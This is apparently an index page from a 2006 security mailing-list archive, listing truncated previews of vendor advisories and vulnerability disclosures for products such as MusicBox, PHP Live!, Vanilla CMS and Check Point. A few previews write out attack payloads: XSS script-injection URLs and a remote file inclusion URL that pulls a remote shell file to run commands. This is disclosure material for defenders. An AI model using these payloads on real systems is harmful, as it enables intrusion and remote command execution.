|
|
Colapse all |
Post message
[SECURITY] [DSA 1123-1] New libdumb packages fix arbitrary code execution 2006-07-24 Moritz Muehlenhoff (jmm debian org) Write-up by Amit Klein: "Forging HTTP request headers with Flash" 2006-07-24 Amit Klein (AKsecurity) (aksecurity hotpop com) ERRATA: [ GLSA 200607-08 ] GIMP: Buffer overflow 2006-07-24 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Windows XP/NT/SMB2003/2000 Denial of Service attack 2006-07-24 J. Oquendo (joquendo hushmail com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 According to Microsoft the following tool does nothing to Windows based machines. According to my experience it does. According to the experience of 5 separate administrators it does as well. You be the judge of this. Initially this is/was a tool calle [ more ] [ reply ] MusicBox <= 2.3.4 XSS SQL injection Vulnerability 2006-07-24 securityconnection gmail com MusicBox 2.3.4 http://www.musicboxv2.com ------------ PHPinfo page ------------ /phpinfo.php -------------------------- Cross Site Scripting (XSS) -------------------------- http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script> &page=0 http://www.target.xx/index.php?id=>< [ more ] [ reply ] [USN-322-1] Konqueror vulnerability 2006-07-24 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-322-1 July 24, 2006 kdelibs vulnerability CVE-2006-3672 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 U [ more ] [ reply ] Check Point R55W Directory Traversal 2006-07-24 Sec-Tec Lists (zen31438 zen co uk) Overview Check Point Firewall-1 R55W contains a hard coded web server, which runs on TCP port 18264. This server is there to deal with PKI requirements for Check Point's VPN functionality. During a routine penetration test of a client, Sec-Tec discovered a directory traversal vulnerability that al [ more ] [ reply ] [SECURITY] [DSA 1124-1] New fbi packages fix potential deletion of user data 2006-07-24 Moritz Muehlenhoff (jmm debian org) Digital Armaments Security Advisory 24.07.2006: Siemens Speedstream Wireless/Router Denial of Service Vulnerability 2006-07-24 info digitalarmaments com Digital Armaments advisory is 05.4.2006 http://www.digitalarmaments.com/2006310665340982.html I. Background The SpeedStream Wireless DSL/Cable Router is usually adopted for home and small business solutions. Together with an existing DSL or cable modem connection, this affordable, easy to use [ more ] [ reply ] Buffer-overflow in the XM loader of Cheese Tracker 0.9.9 2006-07-23 Luigi Auriemma (aluigi autistici org) [SECURITY] [DSA 1121-1] New postgrey packages fix denial of service 2006-07-24 joey infodrom org (Martin Schulze) PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities 2006-07-24 saudi unix hotmail com -PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities ######################################## By saudi hackrz --------------------------------------- Exploit : http://[target]/[path]/setup/header.php?css_path=http://sit/shell.txt?cm d=ls ------------------------------------- [ more ] [ reply ] [CYBSEC] TippingPoint detection bypass 2006-07-24 Andres Riancho (ariancho cybsec com) CYBSEC S.A. www.cybsec.com Pre-Advisory Name: TippingPoint detection bypass ============== Vulnerability Class: Design flaw ============== Release Date: 07/24/2006 ========== Affected Platforms: ============= * All TippingPoint appliances with TOS <= 2.2.3.6514 Local / Remote: Remote ========== [ more ] [ reply ] [ GLSA 200607-08 ] GIMP: Buffer overflow 2006-07-23 Sune Kloppenborg Jeppesen (jaervosz gentoo org) (1 replies) [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla] 2006-07-23 botan linuxmail org Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln. 2006-07-23 mfoxhacker gmail com Vanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln. ######################################################################## ## Vendor : Vanilla CMS Demo : http://demo.opensourcecms.com/vanilla/ Get Source : http://getvanilla.org/ Vuln type : Remote Risk : High ############ [ more ] [ reply ] [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities 2006-07-23 admin majorsecurity de [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities ------------------------------------------------------------------------ ---------------- Software: Woltlab Burning board Impact: Cookie manipulation and Session Fixation Made publi [ more ] [ reply ] [SECURITY] [DSA 1120-1] New Mozilla Firefox packages fix several vulnerabilities 2006-07-23 joey infodrom org (Martin Schulze) Re: Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability 2006-07-21 sales flexwatch com Re: [Full-disclosure] Re: New PowerPoint Trojan installs itself as LSP 2006-07-21 Juha-Matti Laurio (juha-matti laurio netti fi) Many thanks for this useful information. These new type of Trojans are known as Trojan.Riler.F, Win32.Fantador.E etc. Names available have been updated to the PowerPoint FAQ, http://blogs.securiteam.com/?p=508 The following description including information about proxy-like feature is worth of che [ more ] [ reply ] Map MS Security Bulletins to MS KB numbers 2006-07-20 Matthew Leeds (mleeds theleeds net) I'm looking for a resource that maps Microsoft Security Bulletin numbers (such as MS06-033) to Microsoft Knowledge Base numbers (such as KB 917283). I recognize that this may be a one to many mapping since a single SB may point to a set of possible patches depending on OS version or application vers [ more ] [ reply ] Re: [MajorSecurity #22] Top XL <=1.1 - XSS and cookie disclosure 2006-07-20 admin majorsecurity de Hi there. There's a little mistake in my advisory. The correct Vendor is: "http://www.derwebgestalter.de/" and the script is available under "http://www.derwebgestalter.de/" and ALSO under "http://www.paddelberg.de/gratis-toplisten-script/" Thanks for your attention. David Vieira Kurz [ more ] [ reply ] Blackboard Academic Suite 6.2.23 +/-: Persistent cross-site scripting vulnerability 2006-07-20 harbl hushmail com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I. Affected Software Blackboard Academic Suite 6.2.3.23 Prior or newer versions may also be affected. Vendor website: http://www.blackboard.com/ II. Impact Subjective: Severe Objective: Privilege escalation III. Vulnerability There is a persistent/ [ more ] [ reply ] Com Multibanners Remote File Inclusion (mosConfig_absolute_path) 2006-07-20 mail blue-spy net #############################SolpotCrew Community################################ # # Com Multibanners Remote File Inclusion (mosConfig_absolute_path) # # original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt # ########################################################## [ more ] [ reply ] MiniBB Forum <= 1.5a Remote File Include (news.php) 2006-07-20 AG Spider (ag-spider hotmail com) Title : MiniBB Forum <= 1.5a Remote File Include (news.php) ######################################################################## ####### Discovered By AG-Spider ------------------------------------------------------------------------ ----- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~ [ more ] [ reply ] DotClear : Multiples Full Path Disclosure 2006-07-22 Silitix gmail com # DotClear : Multiples Full Path Disclosure # Discovred By Silitix - Silitix_gmail_com # www.Silitix.com A remote user can access the files directly to cause the system to display an error message that indicates the full path of the server. /ecrire/tools/blogroll/edit_cat.php /ecrire/tool [ more ] [ reply ] |
|
Privacy Statement |
Hash: SHA1
- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1123-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
July 24th, 2006
[ more ] [ reply ]